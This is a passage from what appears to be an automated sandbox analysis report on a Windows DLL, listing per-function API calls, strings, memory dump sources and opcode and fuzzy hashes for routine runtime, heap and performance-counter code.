                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31cf4a464588e9662cbe7de42673691b9a0f35b521f8d931fa172eff98d6277e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036108B6E0421E9FDB04CFA8C9919EDFBF5EF48314B2441AAD855A7340E735AA418F90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6F21AB58,00000000,?,00000001,00000000,?,6F21ABCF,00000001,FlsFree,6F23AE3C,FlsFree,00000000), ref: 6F21AB27
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                    • Opcode ID: e5adb99c77cac4e38f3a7b0aa75b43f5e1f7136089ea9480351d716e3c0278a0
                                                                                                                                                                                                                    • Instruction ID: 48c9b7b7d4bf65137637238e0d9e4bcace6025c229f9bf0be060fba738951863
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5adb99c77cac4e38f3a7b0aa75b43f5e1f7136089ea9480351d716e3c0278a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63110AB2A4D669A7DF32CA689D55B4933F6EF12771F100221EA10EB180D770FA14CED5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6F210CFA
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6F210D0E
                                                                                                                                                                                                                    • InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6F210D22
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Performance Monitor - (Reload Configuration), xrefs: 6F210CFC
                                                                                                                                                                                                                    • Performance Monitor - (Edit Configuration), xrefs: 6F210D10
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InsertMenu
                                                                                                                                                                                                                    • String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
                                                                                                                                                                                                                    • API String ID: 1478380399-4081388356
                                                                                                                                                                                                                    • Opcode ID: 75eb1633f7638876f0fb5f90e3b398434e9456fb3775bdeff57e44e92a3dd6b1
                                                                                                                                                                                                                    • Instruction ID: c83b09d03ada3ed45ee7521064bda4b50896316b04905ac6af0af3927974706c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75eb1633f7638876f0fb5f90e3b398434e9456fb3775bdeff57e44e92a3dd6b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8F03A7324021D7BEB11DE859C80FAB7BACFB49620F154016FF14A6181C2B1A9229FB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6F224E49,?,?,6F224E11,?,00000000), ref: 6F224EB8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F224ECB
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6F224E49,?,?,6F224E11,?,00000000), ref: 6F224EEE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: 07c9cf363763da66658bcf77173329d6f0d4bd850e73f1dc08a629a5282fb962
                                                                                                                                                                                                                    • Instruction ID: d8f56ea4ae7bdcb45d9984ccb54ba6a2208624f5fb1b2b75f30b5ac950cf1c35
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07c9cf363763da66658bcf77173329d6f0d4bd850e73f1dc08a629a5282fb962
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A4B1A0051DBBDF149F90C80CBAEBFB5FF06326F004065E805A2540DF709960CE90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229DD1
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229DE8
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E07
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E22
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F229E39
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                                                                                    • Opcode ID: 65d7656eb3e57675d8a45274ecb586e5c6b3ce6bb9422f52c6db91244e90e4f6
                                                                                                                                                                                                                    • Instruction ID: 3014d17c49f95c42ea24143205b2b358d800a31c4fe4072c4af6fa58b27fcf37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65d7656eb3e57675d8a45274ecb586e5c6b3ce6bb9422f52c6db91244e90e4f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51A272A04709AFD711DF69CC80BAA77F4EF49725F10066AE809DB694E731E910DF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PdhRemoveCounter.PDH(?,819F5D14,?,?,00000000,6F238180,000000FF,?,6F2107EE,00000000), ref: 6F2133C4
                                                                                                                                                                                                                    • PdhCloseQuery.PDH(?,819F5D14,?,?,00000000,6F238180,000000FF,?,6F2107EE,00000000), ref: 6F2133DA
                                                                                                                                                                                                                    • PdhOpenQueryW.PDH(00000000,00000000,00000000), ref: 6F213404
                                                                                                                                                                                                                    • PdhValidatePathW.PDH(?), ref: 6F213467
                                                                                                                                                                                                                    • PdhAddCounterW.PDH(00000000,?,00000000,?), ref: 6F21348E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CounterQuery$CloseOpenPathRemoveValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 698537007-0
                                                                                                                                                                                                                    • Opcode ID: 664fdaca9ca7032add78b8c2e636f3656b68578b8a8f29c81fb32122a3437b32
                                                                                                                                                                                                                    • Instruction ID: d2680ccf24be62dcefc1ce1f244c39657326be9dea81a6eb9bb05bbe7b3f1fe6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 664fdaca9ca7032add78b8c2e636f3656b68578b8a8f29c81fb32122a3437b32
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5751AE72904649ABDB20CF14C845BDAF7B9FF05710F0082A6E659EB680DB74BE90CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6F207855
                                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6F207889
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,6F2067DC,74780DE0), ref: 6F2078BF
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,6F2067DC,74780DE0), ref: 6F207906
                                                                                                                                                                                                                    • GetCursor.USER32(819F5D14,00000000,0000005F,00000000,00000003,0B8FEA98,00000000,?,6F2067DC,74780DE0), ref: 6F207960
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardCurrentCursorOpenProcessWindow__aulldiv__aullrem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 265221378-0
                                                                                                                                                                                                                    • Opcode ID: a4640ee04f703a61c209206cfddf59f44a607bc709c99f18f47c9ff0849a9e75
                                                                                                                                                                                                                    • Instruction ID: 61476782416e1f3958e902fc6c6e326b2769b033467f46db3da05ffb2b1af1c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4640ee04f703a61c209206cfddf59f44a607bc709c99f18f47c9ff0849a9e75
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1417077E1074E5AEB04E67A88C1A6DB7679FDB255F24C72A9800E75C0EB70B8908F40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204CC6
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204CE6
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204D06
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F204DA1
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204DB9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                                                                                    • Opcode ID: 11302a50c6f6d287947df4115df44121987ff30e0fb3d6613a3d372cbc88c43c
                                                                                                                                                                                                                    • Instruction ID: b6716cee6766cef20aac4a0ed5f75c9899bd0bb59b393c109b0709988adac32a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11302a50c6f6d287947df4115df44121987ff30e0fb3d6613a3d372cbc88c43c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841BBB2904619CBCB14EF98C584B9ABBF4FF15724F1081AED806AB680DB71B905CFC1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6F24BA20), ref: 6F21219C
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F2121AC
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F2121C9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6F24BA20), ref: 6F2121ED
                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00000000), ref: 6F212239
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CurrentEnterLongThreadWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4199534935-0
                                                                                                                                                                                                                    • Opcode ID: 675b552fcd49920bf1ce3da4a10e976e414c0d539a465d62de6c804f6a244631
                                                                                                                                                                                                                    • Instruction ID: 2cc38000854ed7061ba295707e723934e215587871bd308a32af5549a339e5b8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675b552fcd49920bf1ce3da4a10e976e414c0d539a465d62de6c804f6a244631
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221A4B2A0862A9BD724DF75DC4885B7BB9EF863713104516FA09CB681DB70E460CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 6F22C033
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F22C056
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6F22C07C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22C08F
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F22C09E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                    • Opcode ID: 28e7285eb75f5a18429c82e21549bb92c345082198a8a7378454bbc46fc5d325
                                                                                                                                                                                                                    • Instruction ID: bc3d61662cde6df23f7d19eb9dd64cef4e08bb8b4539310aa2a8b442b956cb8a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e7285eb75f5a18429c82e21549bb92c345082198a8a7378454bbc46fc5d325
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01B5B3645B19BF673106BA4C8CDBB3AADDAC3E713100219F914D2140DF60DE11C9B0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22869B
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,030B8168,00000000), ref: 6F2286A8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                    • Opcode ID: 81cb1be6cb82c894dd76a8fb5d6a1d111fb7a62e29742b9d40da5abbf1ba979e
                                                                                                                                                                                                                    • Instruction ID: 9df8937f47f571934ea1245f2ce57acb58c5afeae40f55a30cb729b6f0b6be51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cb1be6cb82c894dd76a8fb5d6a1d111fb7a62e29742b9d40da5abbf1ba979e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11A93214CA0D6BCB012639DE08EBE32E9BB83B79B140316F438A69C0EF65C525CD24
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232B86
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232B98
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BAA
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BBC
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F232BCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: d1c65b10ef5cf74be160ce8789b0a034de6ae0c9d2a8de6a9c58c943343a5cea
                                                                                                                                                                                                                    • Instruction ID: b29cec8e65859ad18d14de4d8ccf67ab214df78504927474c958bd14f5f94a14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c65b10ef5cf74be160ce8789b0a034de6ae0c9d2a8de6a9c58c943343a5cea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAF062F290C72DD78A14EE68D088D5B73EAEA00B213505806F038D7E80C730F9848EE0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g"o
                                                                                                                                                                                                                    • API String ID: 0-477685306
                                                                                                                                                                                                                    • Opcode ID: 2a0c7596818536f0ec1417b3d564cf8b3fc3991bda4d2d31c75cf2debecb1bfd
                                                                                                                                                                                                                    • Instruction ID: 9d15212bbb2df3aa43ca5353308f72bfd491e279b3919b159250f34156ae986b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a0c7596818536f0ec1417b3d564cf8b3fc3991bda4d2d31c75cf2debecb1bfd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361AE71A24A0EABDB00DBB8C940BEE77F9AF0A315F404151E410BB591E770AA51DF62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22B8FA: GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC,6F224F7A), ref: 6F22BDDE
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC), ref: 6F22BDF0
                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,6F22BBC8,?,zO"o,6F22BBC8,?,00000000,?,?,?,?,?,?,6F24D0FC,6F224F7A), ref: 6F22BE03
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 546120528-616525808
                                                                                                                                                                                                                    • Opcode ID: c52727ba5e65ff6b82b3f6ca8cb4f5b8511b67813b4f753e037d09db664a3e7a
                                                                                                                                                                                                                    • Instruction ID: 550795e8771829ec23ac1238fa665bfaac92eb15f20f19a7f9bd1093f2e8434f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52727ba5e65ff6b82b3f6ca8cb4f5b8511b67813b4f753e037d09db664a3e7a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651757090434E8FDB20CF35C890AEABBFAEF02314F50416EE1A98B591D775A545CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6F22F301
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000), ref: 6F22F30D
                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6F22F314
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                                                                                                                    • String ID: Tm"o
                                                                                                                                                                                                                    • API String ID: 2434981716-1604003187
                                                                                                                                                                                                                    • Opcode ID: 2af83784318a733313daccff75241479feba98bf2e23006fe34455ee1d2c6734
                                                                                                                                                                                                                    • Instruction ID: 0f7ecf8afc1ae9b92fff172fa50fa87dd9270cbf95c02c2537569676dfe81426
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2af83784318a733313daccff75241479feba98bf2e23006fe34455ee1d2c6734
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F341547571829DAFDB11CF68C980AAA7FE5FF47314F14439AE8849B642D770A821CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
